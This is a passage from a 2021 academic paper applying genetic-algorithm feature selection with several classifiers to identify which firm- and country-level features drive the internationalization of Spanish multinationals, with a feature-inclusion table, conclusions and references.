ELM—sin that have obtained the best results: (A) number of features (in magenta) and (B) average error (in red), standard deviation of the error (in green), and error of the best individual (in blue). Full-size DOI: 10.7717/peerj-cs.403/fig-4 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 16/26 http://dx.doi.org/10.7717/peerj-cs.403/fig-4 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ (Nachum, Zaheer & Gross, 2008) or opportunities for arbitrage, complementarity and creative diversity (Pankaj, 2001; Ghemawat, 2003; Shenkar, Luo & Yeheskel, 2008; Zaheer, Schomaker & Nachum, 2012; Taras et al., 2019). Overall, the results clearly depict a complex and multi-dimensional reality in which constructs that are frequently mentioned as determinants of internationalization (experience, distance, and diversification) are indeed complex constructs made of multiple layers that need to be disentangle and analyzed separately to fully understand the impact of each component (Dow & Karunaratna, 2006; Jiménez et al., 2018; Berry, Guillén & Zhou, 2010; Pankaj, 2001). Further, the results of the various classifiers consistently point to the critical role of the resources accumulated by the MNE both in terms of employes and own experience in multiple international markets. Finally, these results reinforce the utility of Machine Learning approaches as a complementary tool for researchers, as they permit the identification of patterns from and abductive and an inductive way that other variables employed for deductive causal inference could overlook (Choudhury, Allen & Endres, 2021; Choudhury et al., 2019). The main target of the present research has been to reduce the number of features to look for when taking internationalization decisions. It can be easily checked that this objective has been achieved when looking at the number of features comprised in the best individuals. It is worth mentioning the case of BDTs, where only 7 out of the original 25 features (reduction of 72%) were selected while the misclassification rate is the second lowest. In the case of ELMs, it has been reduced up to 9, obtaining the best classification error. Something similar can be said when analyzing the average number of features that is significantly lower than the number of features in the original dataset. The lowest average value (8.8) is taken when applying ELMs and hence for the lowest classification error. When looking at the deviation of the number of features for the best individuals in the 10 iterations (Fig. 4A), it can be said that the mean and the median are quite close in the case of ELMs results, with a significantly small deviation in the case of ELMs with the sinusoidal function (ELM—sin). In the case of BDTs, values greatly vary (from 3 to 17). Regarding the average error (in red in Fig 4B) of the whole population in the last generation, ELMs have obtained lower values than BDTs. More precisely, the lowest value of all the iterations (0.102) has been obtained by ELM—sig (identified as an outlier in the boxplot). Additionally, the values obtained by ELMs are very compact (low standard deviation). The same can be said about the error of the best individuals (in blue in Fig. 4B). Finally, when analyzing the standard deviation of the error (in green in Fig. 4B), it can be concluded that the highest value (identified as an outlier in the boxplot) has been obtained by the BDT while the lowest ones have been obtained by ELM—sig. Each one of the features in the original set has been analyzed, from an individual standpoint, for a more comprehensive study. It is shown in Table 5 the percentage of best solutions that includes each one of the original features, for the different classifiers in all the 10 iterations. Additionally, the sum of percentages has also been calculated, and features are ranked, in decreasing order according to it. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 17/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ The key features (those with the highest inclusion percentage) can be selected from Table 5. According to that, the most important features (highest accumulated inclusion rates, above 340) are (in decreasing order of importance): “Number of Countries”, “Vicarious Experience Same Sector”, and “Manufacturing”. These are also the features with a highest inclusion rate in the case of BDTs and ELMs (SUM BDT+ELM in Table 5). More precisely, “Number of Countries” can be considered as the top feature as it is the one with the highest inclusion rate and was included in all the best individuals obtained by SVMs, BDTs, and ELMs. From Table 5, the least important features (lowest inclusion percentage) can be also identified. They include “Psychic Distance—Democracy”, “Population (Log)”, “Psychic Distance—Industrial Development”, and “Psychic Distance—Social System”, that have obtained the lowest accumulated inclusion rates (below 120). Table 5 Inclusion percentage of original features in the best individuals for all the iterations with the different classifiers. # Feature name % SVM RF BDT ELM SUM BDT+ELM SUM TOTAL 25 Number of Countries 100 70 100 100 200 370 2 Vicarious Experience Same Sector 100 80 80 95 175 355 4 Manufacturing 90 70 100 90 190 350 20 Employees 80 100 50 80 130 310 24 Unrelated Diversification 80 70 80 45 125 275 5 Food 50 60 50 80 130 240 6 Construction 0 90 60 80 140 230 23 Related Diversification 80 90 50 0 50 220 21 ROE 20 100 60 35 95 215 9 Geographic Distance (Log) 40 90 60 15 75 205 10 Psychic Distance—Education 60 70 50 25 75 205 12 Psychic Distance—Language 50 60 60 30 90 200 7 Regulated 60 60 30 40 70 190 18 GDP Growth 40 70 50 5 55 165 22 Stock Market 50 70 40 5 45 165 8 Financial 10 60 50 40 90 160 1 Vicarious Experience 70 20 20 40 60 150 3 Vicarious Experience Different Sector 70 40 0 35 35 145 17 FDI/GDP 60 60 10 10 20 140 15 Psychic Distance—Religion 30 50 40 0 40 120 16 Unemployment 50 50 20 0 20 120 13 Psychic Distance—Democracy 50 40 20 5 25 115 19 Population (Log) 20 40 30 20 50 110 11 Psychic Distance—Industrial Development 30 20 40 5 45 95 14 Psychic Distance—Social System 20 40 30 0 30 90 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 18/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ These most and least important features reinforce the ideas discussed above in terms of the relevance of the resources accumulated by the firm in terms of manpower and previous experience in multiple international markets. Also in line with the previous findings, vicarious experience from firms in the same sector and the specific industry to which the MNE belongs to (notably in the case of Manufacturing) manifest themselves as critical determinants. In contrast, other sources of vicarious experience such as the one from firms in other sectors or the combination of vicarious experience from the same and different sectors have a much less important role. As such, the results align more with those found by Jiang, Holburn & Beamish (2014) than with Jiménez & De la Fuente (2016). The results also underline the fact that psychic distance do not appear as a critical determinant, and only the dimensions of education and language are moderately relevant. As in the previous case, these results therefore underline the relevance of language distance in international business (Dow, Cuypers & Ertug, 2016; Jimenez, Holmqvist & Jimenez, 2019), and point to the potential confounding effect of the positive and negative effects of distance in the rest of dimensions (Pankaj, 2001; Ghemawat, 2003; Shenkar, Luo & Yeheskel, 2008; Zaheer, Schomaker & Nachum, 2012; Taras et al., 2019). These results (BDTs and ELMs) can be compared with previous ones obtained by SVMs and RFs, and they are consistent. However, they are different in the case of features “Employees” and “Manufacturing”. The first one obtained the highest inclusion rate by combining SVMs and RFs while it is the fifth one when considering BDTs and ELMs. Similarly, “Manufacturing” has obtained the second highest inclusion rate by combining BDTs and ELMs. It was identified as the fifth most important one when considering SVMs and RFs. On the other hand, when comparing the least important features, “Psychic Distance—Social System” and “Psychic Distance—Industrial Development” were identified by SVMs and RFs. “Psychic Distance—Democracy”, “FDI/GDP”, and “Unemployment” have been identified by BDTs and ELMs. From this comparison of classifier results, it can be observed that while all the learning models emphasize the importance of firm-level determinants over country-level ones, SVMs and RFs find the size of the MNE as measured by the number of employes to be more relevant whereas for BDTs and ELMs it has a more modest role and, in contrast, the influences of the industry to which the MNE belongs are more prevalent. Regarding the least important features, all the classifiers identify country-level characteristics, such as various dimensions of psychic distance and some macroeconomic figures related to the economy international openness and the labor market. CONCLUSIONS In this paper we aim to employ sophisticated AI techniques to explore the various possible configurations of variables that may play a critical impact on internationalization, in order to overcome limitations related to bounded rationality (Barnard & Simon, 1947) and provide insightful information relevant for managers and policy-makers. From the previously presented results, it can be concluded that advanced FS can be successfully applied in order to identify the most and least relevant features concerning the Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 19/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ internationalization strategy of enterprises. More precisely, the ELM has proved to be the wrapper learning model able to obtain the lowest error when predicting the internationalization decision on the dataset under study. The results obtained in this research clearly show that firm-level characteristics are more relevant than country-level ones. Perhaps more importantly, the findings underline that constructs such as experience, product diversification or (psychic) distance are indeed complex and multi-dimensional, and that not all their components have the same importance. It is therefore necessary that future works take this complexity into consideration and researchers refrain from employing aggregated measures of these constructs and, instead, test the individual effects of each component or dimension. Overall, the results in fact are consistent with previous works and with the state of the art, but also serve to provide empirical evidence that can contribute to unresolved debates in the literature (i.e., regarding the type of vicarious experience or dimension of psychic distance with the utmost importance). In this sense, we concur with recent research (Choudhury et al., 2019; Choudhury, Allen & Endres, 2021) highlighting the complementarities between Machine Learning techniques and other traditional tools, as the former permit identifying patterns from an abductive and an inductive way that deductive approaches such as classic regression, due to their constraints to fit models, sometimes overlook. We acknowledge that our paper is subject to some limitations, which open up interesting opportunities for further research. First, we are unable to include additional variables that could be relevant, such as the percentage of exports or the exact year the company started international operations, due to data unavailability in the data sources we were able to access on Spanish MNEs. Besides, a transnational study is planned as future work, comprising data from additional countries. Additionally, some other classifiers and combinations of them will be applied, trying to get and even lower misclassification rate. ACKNOWLEDGEMENTS The work was conducted during the research stays of Álvaro Herrero and Roberto Alcalde at KEDGE Business School in Bordeaux (France) ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Álvaro Herrero conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 20/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ � Alfredo Jiménez conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Roberto Alcalde conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data and code are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.403#supplemental-information. REFERENCES Ambos B, Leicht-Deobald U, Leinemann A. 2019. Understanding the formation of psychic distance perceptions: are country-level or individual-level factors more important? International Business Review 28(4):660–671 DOI 10.1016/j.ibusrev.2019.01.003. Argote L, Beckman SL, Epple D. 1990. The persistence and transfer of learning in industrial settings. Management Science 36(2):140–154 DOI 10.1287/mnsc.36.2.140. Azar G, Drogendijk R. 2014. Psychic distance, innovation, and firm performance. Management International Review 54(5):581–613 DOI 10.1007/s11575-014-0219-2. Barkema HG, Bell JH, Pennings JM. 1996. Foreign entry, cultural barriers, and learning. Strategic Management Journal 17:151–166 DOI 10.1002/(SICI)1097-0266(199602)17:2<151::AID-SMJ799>3.0.CO;2-Z. Barnard C, Simon HA. 1947. Administrative behavior: a study of decision-making processes in administrative organization. New York: Free Press. Berry H, Guillén MF, Zhou N. 2010. An institutional approach to cross-national distance. Journal of International Business Studies 41(9):1460–1480 DOI 10.1057/jibs.2010.28. Bhowmick S. 2019. How psychic distance and opportunity perceptions affect entrepreneurial firm internationalization. Canadian Journal of Administrative Sciences/Revue Canadienne des Sciences de l’Administration 36(1):97–112 DOI 10.1002/cjas.1482. Blomkvist K, Drogendijk R. 2013. The impact of psychic distance on Chinese outward foreign direct investments. Management International Review 53(5):659–686 DOI 10.1007/s11575-012-0147-y. Brewer P. 2007. Operationalizing psychic distance: a revised approach. Journal of International Marketing 15(1):44–66 DOI 10.1509/jimk.15.1.044. Centre d’Études Prospectives et d’Informations Internationales (CEPII). 2020. CEPII homepage. Available at http://www.cepii.fr (accessed 29 December 2020). Chiesa M, Maioli G, Colombo GI, Piacentini L. 2020. GARS: genetic algorithm for the identification of a Robust Subset of features in high-dimensional datasets. BMC Bioinformatics 21(1):54 DOI 10.1186/s12859-020-3400-6. Chikhouni A, Edwards G, Farashahi M. 2017. Psychic distance and ownership in acquisitions: direction matters. Journal of International Management 23(1):32–42 DOI 10.1016/j.intman.2016.07.003. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 21/26 http://dx.doi.org/10.7717/peerj-cs.403#supplemental-information http://dx.doi.org/10.7717/peerj-cs.403#supplemental-information http://dx.doi.org/10.7717/peerj-cs.403#supplemental-information http://dx.doi.org/10.1016/j.ibusrev.2019.01.003 http://dx.doi.org/10.1287/mnsc.36.2.140 http://dx.doi.org/10.1007/s11575-014-0219-2 http://dx.doi.org/10.1002/(SICI)1097-0266(199602)17:2%3C151::AID-SMJ799%3E3.0.CO;2-Z http://dx.doi.org/10.1057/jibs.2010.28 http://dx.doi.org/10.1002/cjas.1482 http://dx.doi.org/10.1007/s11575-012-0147-y http://dx.doi.org/10.1509/jimk.15.1.044 http://www.cepii.fr http://dx.doi.org/10.1186/s12859-020-3400-6 http://dx.doi.org/10.1016/j.intman.2016.07.003 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Choudhury P, Allen RT, Endres MG. 2021. Machine learning for pattern discovery in management research. Strategic Management Journal 42(1):30–57 DOI 10.1002/smj.3215. Choudhury P, Wang D, Carlson NA, Khanna T. 2019. Machine learning approaches to facial and text analysis: discovering CEO oral communication styles. Strategic Management Journal 40(11):1705–1732 DOI 10.1002/smj.3067. Chyzhyk D, Savio A, Graña M. 2014. Evolutionary ELM wrapper feature selection for Alzheimer’s Disease CAD on anatomical brain MRI. Neurocomputing 128(April):73–80 DOI 10.1016/j.neucom.2013.01.065. Clarke JE, Tamaschke R, Liesch PW. 2013. International experience in international business research: a conceptualization and exploration of key themes. International Journal of Management Reviews 15(3):265–279 DOI 10.1111/j.1468-2370.2012.00338.x. Clavel San Emeterio M, Fernández-Ortiz R, Arteaga-Ortiz J, Dorta-González P. 2018. Measuring the gradualist approach to internationalization: Empirical evidence from the wine sector. PLOS ONE 13(5):e0196804 DOI 10.1371/journal.pone.0196804. Contreras S, Manzanedo MÁ, Herrero Á. 2019. A hybrid neural system to study the interplay between economic crisis and workplace accidents in Spain. Journal of Universal Computer Science 25:667–682. Cyert RM, March JG. 1963. A behavioral theory of the firm. Malden: Blackwell. Dikova D. 2009. Performance of foreign subsidiaries: does psychic distance matter? International Business Review 18(1):38–49 DOI 10.1016/j.ibusrev.2008.11.001. Dow D. 2020. The research page for Douglas Dow: distance and diversity scales for international business research. Available at http://dow.net.au/?page_id=29 (accessed 29 December 2020). Dow D, Cuypers IR, Ertug G. 2016. The effects of within-country linguistic and religious diversity on foreign acquisitions. Journal of International Business Studies 47(3):319–346 DOI 10.1057/jibs.2016.7. Dow D, Ferencikova S. 2010. More than just national cultural distance: testing new distance scales on FDI in Slovakia. International Business Review 19(1):46–58 DOI 10.1016/j.ibusrev.2009.11.001. Dow D, Karunaratna A. 2006. Developing a multidimensional instrument to measure psychic distance stimuli. Journal of International Business Studies 37(5):575–577 DOI 10.1057/palgrave.jibs.8400222. Dow D, Larimo J. 2009. Challenging the conceptualization and measurement of distance and international experience in entry mode choice research. Journal of International Marketing 17(2):74–98 DOI 10.1509/jimk.17.2.74. Efron B, Tibshirani RJ. 1994. An introduction to the bootstrap. Boca Raton: CRC press. Evans J, Mavondo FT. 2002. Psychic distance and organizational performance: an empirical examination of international retailing operations. Journal of International Business Studies 33(3):515–532 DOI 10.1057/palgrave.jibs.8491029. Extreme Learning Machines. 2020. Basic ELM algorithms. Available at https://personal.ntu.edu.sg/ egbhuang/elm_codes.html (accessed 29 December 2020). Ghemawat P. 2003. The forgotten strategy. Harvard Business Review 81:76–84. Goldberg DE. 1989. Genetic algorithms in search, optimization, and machine learning. Boston: Addison-Wesley. Guillén MF. 2002. Structural inertia, imitation, and foreign expansion: South Korean firms and business groups in China, 1987–1995. Academy of Management Journal 45:509–525. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 22/26 http://dx.doi.org/10.1002/smj.3215 http://dx.doi.org/10.1002/smj.3067 http://dx.doi.org/10.1016/j.neucom.2013.01.065 http://dx.doi.org/10.1111/j.1468-2370.2012.00338.x http://dx.doi.org/10.1371/journal.pone.0196804 http://dx.doi.org/10.1016/j.ibusrev.2008.11.001 http://dow.net.au/?page_id=29 http://dx.doi.org/10.1057/jibs.2016.7 http://dx.doi.org/10.1016/j.ibusrev.2009.11.001 http://dx.doi.org/10.1057/palgrave.jibs.8400222 http://dx.doi.org/10.1509/jimk.17.2.74 http://dx.doi.org/10.1057/palgrave.jibs.8491029 https://personal.ntu.edu.sg/egbhuang/elm_codes.html https://personal.ntu.edu.sg/egbhuang/elm_codes.html http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Herrero Á, Jiménez A. 2019. Improving the management of industrial and environmental enterprises by means of soft computing. Cybernetics and Systems 50(1):1–2 DOI 10.1080/01969722.2019.1560961. Herrero Á, Jiménez A, Bayraktar S. 2019. Hybrid unsupervised exploratory plots: a case study of analysing foreign direct investment. Complexity 2019(1):6271017 DOI 10.1155/2019/6271017. Hofstede G, Hofstede GJ, Minkov M. 2010. Cultures and organizations: software of the mind. New York: McGraw-Hill. Hsu M, Huang C. 2018. Decision support system for management decision in high-risk business environment. Journal of Testing and Evaluation 46(5):2240–2250 DOI 10.1520/JTE20170252. Huang G-B, Zhu Q-Y, Siew CK. 2006. Extreme learning machine: theory and applications. Neurocomputing 70(1–3):489–501 DOI 10.1016/j.neucom.2005.12.126. Huber G. 1991. Organizational learning: the contributing processes and the literatures. Organization Science 2(1):88–115 DOI 10.1287/orsc.2.1.88. Håkanson L, Ambos B, Schuster A, Leicht-Deobald U. 2016. The psychology of psychic distance: antecedents of asymmetric perceptions. Journal of World Business 51(2):308–318 DOI 10.1016/j.jwb.2015.11.005. ICEX Spain Import and Investments. 2020. Network of economic and commercial Spanish offices abroad. Available at http://www.oficinascomerciales.es (accessed 29 December 2020). Jadhav S, He H, Jenkins K. 2018. Information gain directed genetic algorithm wrapper feature selection for credit rating. Applied Soft Computing 69:541–553 DOI 10.1016/j.asoc.2018.04.033. Jiang GF, Holburn GLF, Beamish PW. 2014. The impact of vicarious experience on foreign location strategy. Journal of International Management 20(3):345–358 DOI 10.1016/j.intman.2013.10.005. Jiang F, Sui Y, Cao C. 2013. An incremental decision tree algorithm based on rough sets and its application in intrusion detection. Artificial Intelligence Review 40(4):517–530 DOI 10.1007/s10462-011-9293-z. Jimenez A, Holmqvist J, Jimenez D. 2019. Cross-border communication and private participation projects: the role of genealogical language distance. Management International Review 59(6):1009–1033 DOI 10.1007/s11575-019-00400-y. Jiménez A. 2010. Does political risk affect the scope of the expansion abroad? Evidence from Spanish MNEs. International Business Review 19(6):619–633 DOI 10.1016/j.ibusrev.2010.03.004. Jiménez A, Benito-Osorio D, Puck J, Klopf P. 2018. The multi-faceted role of experience dealing with policy risk: the impact of intensity and diversity of experiences. International Business Review 27(1):102–112 DOI 10.1016/j.ibusrev.2017.05.009. Jiménez A, De la Fuente D. 2016. Learning from others: the impact of vicarious experience on the psychic distance and FDI relationship. Management International Review 56:633–664. Jiménez A, Herrero Á. 2019. Selecting features that drive internationalization of spanish firms. Cybernetics and Systems 50(1):25–39 DOI 10.1080/01969722.2018.1558012. Johanson J, Vahlne J-E. 1977. The internationalization process of the firm: a model of knowledge development and increasing foreign market commitments. Journal of International Business Studies 8(1):23–32 DOI 10.1057/palgrave.jibs.8490676. Johanson J, Vahlne JE. 1990. The mechanism of internationalisation. International Marketing Review 7(4):273 DOI 10.1108/02651339010137414. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 23/26 http://dx.doi.org/10.1080/01969722.2019.1560961 http://dx.doi.org/10.1155/2019/6271017 http://dx.doi.org/10.1520/JTE20170252 http://dx.doi.org/10.1016/j.neucom.2005.12.126 http://dx.doi.org/10.1287/orsc.2.1.88 http://dx.doi.org/10.1016/j.jwb.2015.11.005 http://www.oficinascomerciales.es http://dx.doi.org/10.1016/j.asoc.2018.04.033 http://dx.doi.org/10.1016/j.intman.2013.10.005 http://dx.doi.org/10.1007/s10462-011-9293-z http://dx.doi.org/10.1007/s11575-019-00400-y http://dx.doi.org/10.1016/j.ibusrev.2010.03.004 http://dx.doi.org/10.1016/j.ibusrev.2017.05.009 http://dx.doi.org/10.1080/01969722.2018.1558012 http://dx.doi.org/10.1057/palgrave.jibs.8490676 http://dx.doi.org/10.1108/02651339010137414 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Johanson J, Vahlne J-E. 2009. The uppsala internationalization process model revisited: from liability of foreignness to liability of outsidership. Journal of International Business Studies 40(9):1411–1431 DOI 10.1057/jibs.2009.24. Johanson J, Wiedersheim-Paul F. 1975. The internationalization of the firm: Four Swedish cases. Journal of Management Studies 12(3):305–322 DOI 10.1111/j.1467-6486.1975.tb00514.x. John GH, Kohavi R, Pfleger K. 1994. Irrelevant features and the subset selection problem. In: 11th International Conference on Machine Learning, Morgan Kauffman, 121–129. Klein S, Roth VJ. 1990. Determinants of export channel structure: the effects of experience and psychic distance reconsidered. International Marketing Review 7(5):27–38. Kleinert J, Toubal F. 2010. Gravity for FDI. Review of International Economics 18(1):1–13 DOI 10.1111/j.1467-9396.2009.00869.x. Kogut B, Singh H. 1988. The effect of national culture on the choice of entry mode. Journal of International Business Studies 19(3):411–432 DOI 10.1057/palgrave.jibs.8490394. Kohavi R, John GH. 1997. Wrappers for feature subset selection. Artificial Intelligence 97(1–2):273–324 DOI 10.1016/S0004-3702(97)00043-X. Kramer O. 2017. Genetic algorithm essentials. Cham: Springer International Publishing. Kumar MS. 2009. The relationship between product and international diversification: the effects of short-run constraints and endogeneity. Strategic Management Journal 30(1):99–116 DOI 10.1002/smj.724. Levitt B, March JG. 1988. Organizational learning. Annual Review of Sociology 14(1):319–338 DOI 10.1146/annurev.so.14.080188.001535. Lieberman MB, Asaba S. 2006. Why do firms imitate each other? Academy of Management Review 31:366–385. Magnani G, Zucchella A, Floriani DE. 2018. The logic behind foreign market selection: objective distance dimensions vs. strategic objectives and psychic distance. International Business Review 27(1):1–20 DOI 10.1016/j.ibusrev.2017.10.009. Magnusson P, Schuster A, Taras V. 2014. A process-based explanation of the psychic distance paradox: evidence from global virtual teams. Management International Review 54(3):283–306 DOI 10.1007/s11575-014-0208-5. Maleki N, Zeinali Y, Niaki STA. 2021. A k-NN method for lung cancer prognosis with the use of a genetic algorithm for feature selection. Expert Systems with Applications 164(5):113981 DOI 10.1016/j.eswa.2020.113981. Meng-Yao Z, Rui-Hua Y, Su-Fang Z, Jun-Hai Z. 2012. Feature selection based on extreme learning machine. In: 2012 International Conference on Machine Learning and Cybernetics, 157–162. Meyer KE, Nguyen HV. 2005. Foreign investment strategies and sub-national institutions in emerging markets: evidence from Vietnam. Journal of Management Studies 42(1):63–93 DOI 10.1111/j.1467-6486.2005.00489.x. Nachum L, Zaheer S, Gross S. 2008. Does it matter where countries are? Proximity to knowledge, markets and resources, and MNE location choices. Management Science 54(7):1252–1265 DOI 10.1287/mnsc.1080.0865. Nordman ER, Tolstoy D. 2014. Does relationship psychic distance matter for the learning processes of internationalizing SMEs? International Business Review 23(1):30–37 DOI 10.1016/j.ibusrev.2013.08.010. Nordstrom KA, Vahlne JE. 1990. The internationalization process of the firm: searching for new patterns and explanations. Stockholm: Institute of International Business. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 24/26 http://dx.doi.org/10.1057/jibs.2009.24 http://dx.doi.org/10.1111/j.1467-6486.1975.tb00514.x http://dx.doi.org/10.1111/j.1467-9396.2009.00869.x http://dx.doi.org/10.1057/palgrave.jibs.8490394 http://dx.doi.org/10.1016/S0004-3702(97)00043-X http://dx.doi.org/10.1002/smj.724 http://dx.doi.org/10.1146/annurev.so.14.080188.001535 http://dx.doi.org/10.1016/j.ibusrev.2017.10.009 http://dx.doi.org/10.1007/s11575-014-0208-5 http://dx.doi.org/10.1016/j.eswa.2020.113981 http://dx.doi.org/10.1111/j.1467-6486.2005.00489.x http://dx.doi.org/10.1287/mnsc.1080.0865 http://dx.doi.org/10.1016/j.ibusrev.2013.08.010 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Ojala A, Tyrväinen P. 2009. Impact of psychic distance to the internationalization behavior of knowledge-intensive SMEs. European Business Review 21(3):263–277 DOI 10.1108/09555340910956649. O’Grady S, Lane HW. 1996. The psychic distance paradox. Journal of International Business Studies 27(2):309–333 DOI 10.1057/palgrave.jibs.8490137. Padmanabhan P, Cho KR. 1999. Decision specific experience in foreign ownership and establishment strategies: evidence from Japanese firms. Journal of International Business Studies 30(1):25–41 DOI 10.1057/palgrave.jibs.8490059. Pankaj G. 2001. Distance still matters: the hard reality of global expansion. Harvard Business Review 79:137–147. Panthong R, Srivihok A. 2015. Wrapper feature subset selection for dimension reduction based on ensemble learning algorithm. Procedia Computer Science 72:162–169 DOI 10.1016/j.procs.2015.12.117. Puthusserry PN, Child J, Rodrigues SB. 2014. Psychic distance, its business impact and modes of coping: a study of British and Indian partner SMEs. Management International Review 54(1):1–29 DOI 10.1007/s11575-013-0183-2. Ramanujam V, Varadarajan P. 1989. Research on corporate diversification: a synthesis. Strategic Management Journal 10(6):523–551 DOI 10.1002/smj.4250100603. Rustam Z, Yaurita F, Segovia-Vergas MJ. 2018. Application of support vector machines in evaluating the internationalization success of companies. Journal of Physics: Conference Series 1108:012038 DOI 10.1088/1742-6596/1108/1/012038. Saad A. 2008. An overview of hybrid soft computing techniques for classifier design and feature selection. In: Eighth International Conference on Hybrid Intelligent Systems, 579–583. Safavian SR, Landgrebe D. 1991. A survey of decision tree classifier methodology. IEEE Transactions on Systems, Man and Cybernetics 21(3):660–674 DOI 10.1109/21.97458. Salcedo-Sanz S, Camps-Valls G, Perez-Cruz F, Sepulveda-Sanchis J, Bousono-Calzon C. 2004. Enhancing genetic feature selection through restricted search and Walsh analysis. IEEE Transactions on Systems, Man, and Cybernetics, Part C 34(4):398–406 DOI 10.1109/TSMCC.2004.833301. Shenkar O, Luo Y, Yeheskel O. 2008. From “distance” to “friction”: substituting metaphors and redirecting intercultural research. Academy of Management Review 33(4):905–923 DOI 10.5465/amr.2008.34421999. Siedlecki W, Sklansky J. 1989. A note on genetic algorithms for large-scale feature selection. Pattern Recognition Letters 10(5):335–347 DOI 10.1016/0167-8655(89)90037-8. Simić D, Svirčević V, Ilin V, Simić SD, Simić S. 2019. Particle swarm optimization and pure adaptive search in finish goods’ inventory management. Cybernetics and Systems 50(1):58–77 DOI 10.1080/01969722.2018.1558014. Sreerama KM. 1998. Automatic construction of decision trees from data: a multi-disciplinary survey. Data Mining and Knowledge Discovery 2(4):345–389 DOI 10.1023/A:1009744630224. Taras V, Baack D, Caprar D, Dow D, Froese F, Jimenez A, Magnusson P. 2019. Diverse effects of diversity: disaggregating effects of diversity in global virtual teams. Journal of International Management 25(4):100689 DOI 10.1016/j.intman.2019.100689. Terlaak A, Gong Y. 2008. Vicarious learning and inferential accuracy in adoption processes. Academy of Management Review 33(4):846–868 DOI 10.5465/amr.2008.34421979. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 25/26 http://dx.doi.org/10.1108/09555340910956649 http://dx.doi.org/10.1057/palgrave.jibs.8490137 http://dx.doi.org/10.1057/palgrave.jibs.8490059 http://dx.doi.org/10.1016/j.procs.2015.12.117 http://dx.doi.org/10.1007/s11575-013-0183-2 http://dx.doi.org/10.1002/smj.4250100603 http://dx.doi.org/10.1088/1742-6596/1108/1/012038 http://dx.doi.org/10.1109/21.97458 http://dx.doi.org/10.1109/TSMCC.2004.833301 http://dx.doi.org/10.5465/amr.2008.34421999 http://dx.doi.org/10.1016/0167-8655(89)90037-8 http://dx.doi.org/10.1080/01969722.2018.1558014 http://dx.doi.org/10.1023/A:1009744630224 http://dx.doi.org/10.1016/j.intman.2019.100689 http://dx.doi.org/10.5465/amr.2008.34421979 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Termenon M, Graña M, Barrós-Loscertales A, Ávila C. 2013. Extreme learning machines for feature selection and classification of cocaine dependent patients on structural MRI data. Neural Processing Letters 38(3):375–387 DOI 10.1007/s11063-013-9277-x. Tinbergen J, Hekscher A. 1962. Shaping the world economy: suggestions for an international economic policy. New York: Twentieth Century Fund. Tung RL, Verbeke A. 2010. Beyond Hofstede and GLOBE: improving the quality of cross-cultural research. Journal of International Business Studies 41(8):1259–1274 DOI 10.1057/jibs.2010.41. Vahlne J-E. 2013. The Uppsala model on evolution of the multinational business enterprise—from internalization to coordination of networks. International Marketing Review 30(3):189–210 DOI 10.1108/02651331311321963. Vahlne J-E, Bhatti WA. 2019. Relationship development: a micro-foundation for the internationalization process of the multinational business enterprise. Management International Review 59(2):203–228 DOI 10.1007/s11575-018-0373-z. Vahlne J-E, Johanson J. 2017. From internationalization to evolution: the Uppsala model at 40 years. Journal of International Business Studies 48(9):1087–1102 DOI 10.1057/s41267-017-0107-7. Vahlne J-E, Nordström KA. 1992. Is the globe shrinking? Psychic distance and the establishment of Swedish sales subsidiaries during the last 100 years. Stockholm: Institute of International Business. Wang Y-Y, Zhang H, Qiu C-H, Xia S-R. 2018. A novel feature selection method based on extreme learning machine and fractional-order Darwinian PSO. Computational Intelligence and Neuroscience 2018:1–8 DOI 10.1155/2018/5078268. Xue X, Yao M, Wu Z. 2018. A novel ensemble-based wrapper method for feature selection using extreme learning machine and genetic algorithm. Knowledge and Information Systems 57(2):389–412 DOI 10.1007/s10115-017-1131-4. Yildiz HE, Fey CF. 2016. Are the extent and effect of psychic distance perceptions symmetrical in cross-border M&As? Evidence from a two-country study. Journal of International Business Studies 47(7):830–857 DOI 10.1057/jibs.2016.27. Zaheer S, Schomaker MS, Nachum L. 2012. Distance without direction: restoring credibility to a much-loved construct. Journal of International Business Studies 43(1):19–27 DOI 10.1057/jibs.2011.43. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 26/26 http://dx.doi.org/10.1007/s11063-013-9277-x http://dx.doi.org/10.1057/jibs.2010.41 http://dx.doi.org/10.1108/02651331311321963 http://dx.doi.org/10.1007/s11575-018-0373-z http://dx.doi.org/10.1057/s41267-017-0107-7 http://dx.doi.org/10.1155/2018/5078268 http://dx.doi.org/10.1007/s10115-017-1131-4 http://dx.doi.org/10.1057/jibs.2016.27 http://dx.doi.org/10.1057/jibs.2011.43 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Advanced feature selection to study the internationalization strategy of 